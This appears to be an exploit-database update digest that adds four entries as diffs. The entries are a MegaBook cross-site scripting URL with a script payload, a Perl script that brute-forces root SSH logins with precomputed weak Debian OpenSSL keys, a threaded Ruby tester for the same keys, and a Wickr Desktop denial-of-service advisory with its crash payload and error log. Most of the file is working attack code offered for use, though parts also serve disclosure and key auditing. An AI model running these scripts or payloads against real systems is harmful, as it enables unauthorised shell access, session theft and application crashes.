DB: 2016-01-10

4 new exploits

platforms/cgi/webapps/25622.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/13522/info
+
+MegaBook is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
+
+This issue is reported to affect MegaBook version 2.0; other versions may also be vulnerable. 
+
+http://www.example.com/admin.cgi?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script> 

platforms/linux/remote/5622.txt

@@ -0,0 +1,53 @@
+the debian openssl issue leads that there are only 65.536 possible ssh 
+keys generated, cause the only entropy is the pid of the process 
+generating the key.
+
+This leads to that the following perl script can be used with the 
+precalculated ssh keys to brute force the ssh login. It works if such a 
+keys is installed on a non-patched debian or any other system manual 
+configured to.
+
+On an unpatched system, which doesn't need to be debian, do the following:
+
+keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
+
+1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
+	    https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
+
+2. Extract it to a directory
+
+3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 
+Bits, generated on an upatched debian (this is the key this exploit will 
+break)
+
+4. Run the perl script and give it the location to where you extracted 
+the bzip2 mentioned.
+
+#!/usr/bin/perl
+my $keysPerConnect = 6;
+unless ($ARGV[1]) {
+   print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
+   print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
+   print "By mm@deadbeef.de\n";
+   exit 0;
+}
+chdir($ARGV[0]);
+opendir(A, $ARGV[0]) || die("opendir");
+while ($_ = readdir(A)) {
+   chomp;
+   next unless m,^\d+$,;
+   push(@a, $_);
+   if (scalar(@a) > $keysPerConnect) {
+      system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i 
+".$_ } @a)." ".$ARGV[1]);
+      @a = ();
+   }
+}
+
+5. Enjoy the shell after some minutes (less than 20 minutes)
+
+Regards,
+Markus Mueller
+mm@deadbeef.de
+
+# milw0rm.com [2008-05-15]

platforms/linux/remote/5632.rb

@@ -0,0 +1,78 @@
+#!/usr/bin/ruby
+#
+# Debian SSH Key Tester
+# L4teral <l4teral [at] gmail com>
+#
+# This tool helps to find user accounts with weak SSH keys
+# that should be regenerated with an unaffected version
+# of openssl.
+# 
+# You will need the precalculated keys provided by HD Moore
+# See http://metasploit.com/users/hdm/tools/debian-openssl/
+# for further information.
+#
+# Common Keys:
+#
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
+#
+#
+# Usage:
+# debian_openssh_key_test.rb <host> <user> <keydir>
+#
+
+require 'thread'
+
+THREADCOUNT = 10
+KEYSPERCONNECT = 3
+
+queue = Queue.new
+threads = []
+keyfiles = []
+
+host = ARGV.shift or raise "no host given!"
+user = ARGV.shift or raise "no user given!"
+keysdir = ARGV.shift or raise "no key dir given!"
+
+Dir.new(keysdir).each do |f|
+  if f =~ /\d+$/ then
+    keyfiles << f
+    queue << f
+  end
+end
+
+totalkeys = queue.length
+currentkey = 1
+
+THREADCOUNT.times do |i|
+  threads << Thread.new(i) do |j|
+    while !queue.empty?
+      keys = []
+      KEYSPERCONNECT.times { keys << queue.pop unless queue.empty? }
+      keys.map! { |f| f = File.join(keysdir, f) }
+      keys.each do |k|
+        puts "testing key #{currentkey}/#{totalkeys} #{k}..."
+        currentkey += 1
+      end
+      system "ssh -l #{user} -o PasswordAuthentication=no -i #{keys.join(" -i ")} #{host} \"exit\" &>/dev/null"
+      if $? == 0 then
+        keys.each do |k|
+          system "ssh -l #{user} -o PasswordAuthentication=no -i #{k} #{host} \"exit\" &>/dev/null"
+          if $? == 0 then
+            puts "KEYFILE FOUND: \n#{k}"
+            exit
+          end
+        end
+      end
+    end
+  end
+end
+
+trap("SIGINT") do
+  threads.each { |t| t.exit() } 
+  exit
+end
+
+threads.each { |t| t.join }
+
+# milw0rm.com [2008-05-16]

platforms/windows/dos/35622.txt

@@ -0,0 +1,234 @@
+Document Title:
+===============
+Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1377
+
+Video: 
+http://www.vulnerability-lab.com/get_content.php?id=1388
+
+ 
+Release Date:
+=============
+2014-12-25
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1377
+
+
+Common Vulnerability Scoring System:
+====================================
+3.3
+
+
+Product & Service Introduction:
+===============================
+Wickr (pronounced `wicker`) is a proprietary instant messenger for iPhone and Android. Wickr allows users to exchange end-to-end encrypted and 
+self-destructing messages, including photos and file attachments. The `self-destruct` part of the software is designed to use a `Secure File Shredder` 
+which the company says `forensically erases unwanted files you deleted from your device`. However the company uses a proprietary algorithm to manage 
+the data, a practice which is prone to error according to many security experts.
+
+On January 15, 2014, Wickr announced it is offering a US$100,000 bug bounty for those who find vulnerabilities that significantly impact users. In addition, 
+a recipient can in general use other software and techniques like screen-capture capabilities or a separate camera to make permanent copies of the content.
+
+(Copy of the Homepage: https://wickr.com/ )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research team discovered a denial of service web vulnerability in the offical Wickr Desktop v2.2.1 windows software.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-12-25:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Wickr Inc.
+Product: Wickr - Desktop Software (Windows) 2.2.1
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A local denial of service vulnerability has been discovered in the official Wickr TSM v2.2.1 (MSI) windows software.
+The issue allows local attackers to crash or shutdown the software client by usage of special crafted symbole payloads.
+
+The wickr v2.2.1 (msi) software crashs with unhandled exception in the CFLite.dll by the qsqlcipher_wickr.dll when processing to include 
+special crafted symbole strings 
+as password or name. The issue occurs after the input of the payload to the `change name friend contacts`-, `the wickr password auth`- 
+and the `friends > add friends` input fields. Attackers are able to change the name value of the own profile (payload) to crash the 
+wickr client. Local attackers can include the payload to the input fields to crash/shutdown the application with unhandled exception.
+
+The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. 
+Exploitation of the DoS vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of 
+the vulnerability results in an application crash or service shutdown.
+
+
+Vulnerable Module(s):
+				[+] friend contacts
+				[+] wickr password auth
+				[+] friends
+
+Vulnerbale Input(s):
+				[+] add friends (name)
+				[+] wickr password auth
+				[+] change friend (update name)
+
+Vulnerable Parameter(s):
+				[+] name (value input)
+				[+] password (vale input)
+
+
+Proof of Concept (PoC):
+=======================
+The denial of service web vulnerability can be exploited by remote attackers and local attackers with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Download Wickr v2.2.1 for windows to your windows 8 box (mywickr.info/download.php?p=4) 
+2. Install the wickr windows version of the software to your windows 8 box
+3. Create an new account and include the payload to the password input field
+Note: After the payload has been processed to the auth, the software crashs. You should attach a debugger ago.
+4. Successful reproduce of the first issue!
+5. We register a new account with regular values
+6. Open the friends > add friends section and include the payload to the search input value
+Note: After the payload has been processed to add the friend, the software crashs. You should attach a debugger ago.
+7. Successful reproduce of the second issue!
+8. We open the software again and login. Switch to the existing friends contacts and edit the profile
+9. Include in the name values the payload and save the settings
+Note: After the payload has been processed to change to the name, the software crashs. You should attach a debugger ago.
+4. Successful reproduce of the third issue!
+
+
+Payload: Denial of Service
+็¬็ส็็็็็ -็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็ ¬็็็็ส็็็็็็็็็็็็็¬็็็็ ็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็ ¬็็็็็็ส็็็็็็็¬ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็ 
+
+
+--- Error Report Logs ---
+EventType=APPCRASH
+EventTime=130628671359850105
+ReportType=2
+Consent=1
+UploadTime=130628671360390638
+ReportIdentifier=df89d941-8208-11e4-be8b-54bef733d5e7
+IntegratorReportIdentifier=df89d940-8208-11e4-be8b-54bef733d5e7
+WOW64=1
+NsAppName=Wickr.exe
+Response.BucketId=96ac0935c87e28d0d5f61ef072fd75b8
+Response.BucketTable=1
+Response.LegacyBucketId=73726044048
+Response.type=4
+Sig[0].Name=Anwendungsname
+Sig[0].Value=Wickr.exe
+Sig[1].Name=Anwendungsversion
+Sig[1].Value=0.0.0.0
+Sig[2].Name=Anwendungszeitstempel
+Sig[2].Value=02849d78
+Sig[3].Name=Fehlermodulname
+Sig[3].Value=CFLite.dll
+Sig[4].Name=Fehlermodulversion
+Sig[4].Value=0.0.0.0
+Sig[5].Name=Fehlermodulzeitstempel
+Sig[5].Value=53f6c178
+Sig[6].Name=Ausnahmecode
+Sig[6].Value=c0000005
+Sig[7].Name=Ausnahmeoffset
+Sig[7].Value=00027966
+DynamicSig[1].Name=Betriebsystemversion
+DynamicSig[1].Value=6.3.9600.2.0.0.256.48
+DynamicSig[2].Name=Gebietsschema-ID
+DynamicSig[2].Value=1031
+DynamicSig[22].Name=Zusatzinformation 1
+DynamicSig[22].Value=5861
+DynamicSig[23].Name=Zusatzinformation 2
+DynamicSig[23].Value=5861822e1919d7c014bbb064c64908b2
+DynamicSig[24].Name=Zusatzinformation 3
+DynamicSig[24].Value=84a0
+DynamicSig[25].Name=Zusatzinformation 4
+DynamicSig[25].Value=84a09ea102a12ee665c500221db8c9d6
+UI[2]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
+UI[3]=Wickr.exe funktioniert nicht mehr
+UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
+UI[5]=Online nach einer Lösung suchen und das Programm schließen
+UI[6]=Später online nach einer Lösung suchen und das Programm schließen
+UI[7]=Programm schließen
+... ...  ... ...
+LoadedModule[103]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\sqldrivers\qsqlcipher_wickr.dll
+State[0].Key=Transport.DoneStage1
+State[0].Value=1
+FriendlyEventName=Nicht mehr funktionsfähig
+ConsentKey=APPCRASH
+AppName=Wickr.exe
+AppPath=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
+NsPartner=windows
+NsGroup=windows8
+ApplicationIdentity=6A5425CE651532265F599A5A86C6C2EE
+
+
+
+Security Risk:
+==============
+The security risk of the denial of service web vulnerability in the wickr windows client software is estimated as medium. (CVSS 3.3)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+
+